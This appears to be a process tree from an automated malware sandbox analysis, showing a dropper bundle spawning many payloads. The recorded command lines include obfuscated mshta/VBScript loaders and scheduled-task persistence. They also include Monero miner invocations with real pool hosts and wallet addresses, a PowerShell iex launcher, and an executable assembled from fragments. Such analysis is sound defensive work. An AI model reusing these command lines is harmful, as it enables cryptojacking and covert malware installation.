C:\Users\Admin\AppData\Local\Temp\g0p513gb.sxl\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\g0p513gb.sxl\GcleanerEU.exe /eufive12⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 48612 -s 23213⤵
- Program crash
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wyfa0x54.dnq\installer.exe /qn CAMPAIGN="654" & exit11⤵
-
C:\Users\Admin\AppData\Local\Temp\wyfa0x54.dnq\installer.exeC:\Users\Admin\AppData\Local\Temp\wyfa0x54.dnq\installer.exe /qn CAMPAIGN="654"12⤵
- Enumerates connected drives
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\wyfa0x54.dnq\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\wyfa0x54.dnq\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1635514877 /qn CAMPAIGN=""654"" " CAMPAIGN="654"13⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ohqmuati.t4d\any.exe & exit11⤵
-
C:\Users\Admin\AppData\Local\Temp\ohqmuati.t4d\any.exeC:\Users\Admin\AppData\Local\Temp\ohqmuati.t4d\any.exe12⤵
-
C:\Users\Admin\AppData\Local\Temp\ohqmuati.t4d\any.exe"C:\Users\Admin\AppData\Local\Temp\ohqmuati.t4d\any.exe" -u13⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vxvin3pr.tr3\gcleaner.exe /mixfive & exit11⤵
-
C:\Users\Admin\AppData\Local\Temp\vxvin3pr.tr3\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\vxvin3pr.tr3\gcleaner.exe /mixfive12⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 30588 -s 23613⤵
- Program crash
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zazmh5qd.xqr\autosubplayer.exe /S & exit11⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun03ea09aa5c9686e5.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun03ea09aa5c9686e5.exeSun03ea09aa5c9686e5.exe6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"8⤵
- Executes dropped EXE
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"9⤵
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"10⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"11⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"10⤵
-
C:\Users\Admin\AppData\Roaming\services64.exeC:\Users\Admin\AppData\Roaming\services64.exe11⤵
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"12⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"13⤵
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "/sihost64"14⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.udda/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6OAdluV/h8Wx+uVST9CwRTBBZDSizq+6yEkb73lzV2SG" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth13⤵
- Drops file in Program Files directory
-
C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\2838193.exe"C:\Users\Admin\AppData\Roaming\2838193.exe"9⤵
-
C:\Users\Admin\AppData\Roaming\997740.exe"C:\Users\Admin\AppData\Roaming\997740.exe"9⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\1959615.exe"C:\Users\Admin\AppData\Roaming\1959615.exe"9⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\3392017.exe"C:\Users\Admin\AppData\Roaming\3392017.exe"9⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBScRIPt: cLoSE ( cReateoBJECT( "WSCRiPT.SHelL" ). RuN("C:\Windows\system32\cmd.exe /R copY /Y ""C:\Users\Admin\AppData\Roaming\3392017.exe"" ..\ozR8x.ExE &&STArt ..\ozR8X.Exe /PrWIGG7qbcjwuF1awT~BmZfq & If """" == """" for %T IN (""C:\Users\Admin\AppData\Roaming\3392017.exe"" ) do taskkill -iM ""%~nxT"" -f" , 0,trUe ) )10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R copY /Y "C:\Users\Admin\AppData\Roaming\3392017.exe" ..\ozR8x.ExE &&STArt ..\ozR8X.Exe /PrWIGG7qbcjwuF1awT~BmZfq &If "" =="" for %T IN ("C:\Users\Admin\AppData\Roaming\3392017.exe") do taskkill -iM "%~nxT" -f11⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -iM "3392017.exe" -f12⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Roaming\1462013.exe"C:\Users\Admin\AppData\Roaming\1462013.exe"9⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"10⤵
-
C:\Users\Admin\AppData\Roaming\5295647.exe"C:\Users\Admin\AppData\Roaming\5295647.exe"9⤵
-
C:\Users\Admin\AppData\Local\Temp\inst1.exe"C:\Users\Admin\AppData\Local\Temp\inst1.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\Soft1WW01.exe"C:\Users\Admin\AppData\Local\Temp\Soft1WW01.exe"8⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3956 -s 2969⤵
- Program crash
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\4.exe"C:\Users\Admin\AppData\Local\Temp\4.exe"8⤵
- Executes dropped EXE
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 6020 -s 17129⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\5.exe"C:\Users\Admin\AppData\Local\Temp\5.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"8⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"10⤵
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi11⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )12⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"13⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )12⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC13⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "14⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"14⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC14⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "search_hyperfs_206.exe"11⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4040 -s 6129⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\chenxiulan-game.exe"C:\Users\Admin\AppData\Local\Temp\chenxiulan-game.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"8⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=19⤵
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--iUSIg"10⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\6.exe"C:\Users\Admin\AppData\Local\Temp\6.exe"8⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1900 -s 22609⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1900 -s 22609⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun0328255c4bce6fb.exe5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun03f5d51697d04.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun03f5d51697d04.exeSun03f5d51697d04.exe6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-1CHD0.tmp\Sun03f5d51697d04.tmp"C:\Users\Admin\AppData\Local\Temp\is-1CHD0.tmp\Sun03f5d51697d04.tmp" /SL5="$8002A,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun03f5d51697d04.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun03f5d51697d04.exe"C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun03f5d51697d04.exe" /SILENT8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-OJ03F.tmp\Sun03f5d51697d04.tmp"C:\Users\Admin\AppData\Local\Temp\is-OJ03F.tmp\Sun03f5d51697d04.tmp" /SL5="$4015C,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun03f5d51697d04.exe" /SILENT9⤵
-
C:\Users\Admin\AppData\Local\Temp\is-SO44T.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-SO44T.tmp\postback.exe" ss110⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun0351a0558292.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun0351a0558292.exeSun0351a0558292.exe6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun038db98f99bf9a.exe5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun0397381f1f458e.exe5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun03e4aeb7e43a1c.exe5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun03f0dc4460bc9.exe5⤵
-
C:\Windows\SysWOW64\control.exe"C:\Windows\SysWOW64\control.exe"2⤵
- Adds policy Run key to start application
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies Internet Explorer settings
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\cmd.exe/c del "C:\Users\Admin\Pictures\Adobe Films\dyEvj3hC2t7OMuwoWXdKUmK3.exe"3⤵
-
C:\Windows\SysWOW64\colorcpl.exe"C:\Windows\SysWOW64\colorcpl.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\E26D.exeC:\Users\Admin\AppData\Local\Temp\E26D.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\E26D.exeC:\Users\Admin\AppData\Local\Temp\E26D.exe3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\6A4B.exeC:\Users\Admin\AppData\Local\Temp\6A4B.exe2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6228 -s 2723⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\B9C4.exeC:\Users\Admin\AppData\Local\Temp\B9C4.exe2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX7\mannishly.bat" "3⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX7\bifurcation.exebifurcation.exe -p"xicyqwllwklawixvurbiyphwsjuxiq"4⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX8\beadroll.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX8\beadroll.exe"5⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5280 -s 19286⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5280 -s 19286⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\DB08.exeC:\Users\Admin\AppData\Local\Temp\DB08.exe2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4228 -s 2363⤵
- Program crash
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\3176.exeC:\Users\Admin\AppData\Local\Temp\3176.exe2⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7068 -s 3963⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\7AD5.exeC:\Users\Admin\AppData\Local\Temp\7AD5.exe2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6252 -s 2763⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\BAEC.exeC:\Users\Admin\AppData\Local\Temp\BAEC.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\BAEC.exeC:\Users\Admin\AppData\Local\Temp\BAEC.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\6A96.exeC:\Users\Admin\AppData\Local\Temp\6A96.exe2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6084 -s 2803⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\C866.exeC:\Users\Admin\AppData\Local\Temp\C866.exe2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3720 -s 2403⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Program Files (x86)\Mrbnhc\xfatghhxptwtr.exe"C:\Program Files (x86)\Mrbnhc\xfatghhxptwtr.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\37F1.exeC:\Users\Admin\AppData\Local\Temp\37F1.exe2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\hosts.bat" "3⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nop -win 1 -c iex ([io.file]::ReadAllText($env:0))4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\system32\sc.exe" qc windefend5⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"5⤵
-
C:\Windows\SysWOW64\whoami.exe"C:\Windows\system32\whoami.exe" /groups5⤵
-
C:\Windows\SysWOW64\net1.exe"C:\Windows\system32\net1.exe" start TrustedInstaller5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\hosts.bat" "3⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nop -win 1 -c iex ([io.file]::ReadAllText($env:0))4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\system32\sc.exe" qc windefend5⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"5⤵
-
C:\Windows\SysWOW64\whoami.exe"C:\Windows\system32\whoami.exe" /groups5⤵
-
C:\Windows\SysWOW64\net1.exe"C:\Windows\system32\net1.exe" start TrustedInstaller5⤵
-
C:\Users\Admin\AppData\Roaming\fontdrvhost.exe"C:\Users\Admin\AppData\Roaming\fontdrvhost.exe"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 15296 -s 2404⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe"C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe"3⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe"C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe"4⤵
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\QUKHyXjH3qRKVkqx.exe"C:\Users\Admin\AppData\Local\Temp\QUKHyXjH3qRKVkqx.exe"5⤵
- Drops startup file
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com6⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr.2miners.com:2222 -u 49YaCLR6euq4TAt1Nj42ZeHFmJGdFGJspjjfpWNUaw7jb6L14vAvMZSh27tmKVBivE657AgHGP8XcKVv92D7vtVfQG2ckXx.RIG1 -p x --algo rx/06⤵
-
C:\Users\Admin\AppData\Local\Temp\QUKHyXjH3qRKVkqx.exe"C:\Users\Admin\AppData\Local\Temp\QUKHyXjH3qRKVkqx.exe"5⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com6⤵
-
C:\Users\Admin\AppData\Local\Win32\WindowsUpdate.exe-a "C:\Users\Admin\AppData\Local\a4755c5f\plg\7w7FkvGJ.json"5⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Win32\WindowsUpdate.exe-a "C:\Users\Admin\AppData\Local\Temp\unk.xml"6⤵
- Accesses Microsoft Outlook accounts
-
C:\Users\Admin\AppData\Local\Temp\lp4ZRyw0RpGtlIBV.exe"C:\Users\Admin\AppData\Local\Temp\lp4ZRyw0RpGtlIBV.exe"5⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com6⤵
-
C:\Users\Admin\AppData\Local\Temp\lp4ZRyw0RpGtlIBV.exe"C:\Users\Admin\AppData\Local\Temp\lp4ZRyw0RpGtlIBV.exe"5⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com6⤵
-
C:\Users\Admin\AppData\Local\Win32\WindowsUpdate.exe-a "C:\Users\Admin\AppData\Local\a4755c5f\plg\lp4ZRyw0.json"5⤵
-
C:\Users\Admin\AppData\Local\Win32\WindowsUpdate.exe-a "C:\Users\Admin\AppData\Local\Temp\unk.xml"6⤵
-
C:\Users\Admin\AppData\Local\Temp\AbcatT5YrtyGV4Gv.exe"C:\Users\Admin\AppData\Local\Temp\AbcatT5YrtyGV4Gv.exe"5⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 39228 -s 2566⤵
-
C:\Users\Admin\AppData\Local\Temp\AbcatT5YrtyGV4Gv.exe"C:\Users\Admin\AppData\Local\Temp\AbcatT5YrtyGV4Gv.exe"5⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 40452 -s 2926⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Win32\WindowsUpdate.exe-a "C:\Users\Admin\AppData\Local\a4755c5f\plg\7F0zW8sl.json"5⤵
-
C:\Users\Admin\AppData\Local\Win32\WindowsUpdate.exe-a "C:\Users\Admin\AppData\Local\Temp\unk.xml"6⤵
-
C:\Users\Admin\AppData\Local\Temp\D7FA.exeC:\Users\Admin\AppData\Local\Temp\D7FA.exe2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 13208 -s 2883⤵
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe dcd4e2d229e6a204038c8ed072934241 t3kpkbwC006FvUI4chaFNw.0.1.0.3.01⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\uus\AMD64\MoUsoCoreWorker.exeC:\Windows\uus\AMD64\MoUsoCoreWorker.exe2⤵
-
C:\Windows\uus\AMD64\MoUsoCoreWorker.exeC:\Windows\uus\AMD64\MoUsoCoreWorker.exe2⤵
-
C:\Windows\uus\AMD64\MoUsoCoreWorker.exeC:\Windows\uus\AMD64\MoUsoCoreWorker.exe2⤵
-
C:\Windows\uus\AMD64\MoUsoCoreWorker.exeC:\Windows\uus\AMD64\MoUsoCoreWorker.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun03f0dc4460bc9.exeSun03f0dc4460bc9.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun03f0dc4460bc9.exeC:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun03f0dc4460bc9.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\mk.exe"C:\Users\Admin\AppData\Local\Temp\mk.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun0328255c4bce6fb.exeSun0328255c4bce6fb.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\1907429.exe"C:\ProgramData\1907429.exe"2⤵
- Executes dropped EXE
-
C:\ProgramData\6722478.exe"C:\ProgramData\6722478.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\3782043.exe"C:\ProgramData\3782043.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\4844256.exe"C:\ProgramData\4844256.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\263405.exe"C:\ProgramData\263405.exe"2⤵
-
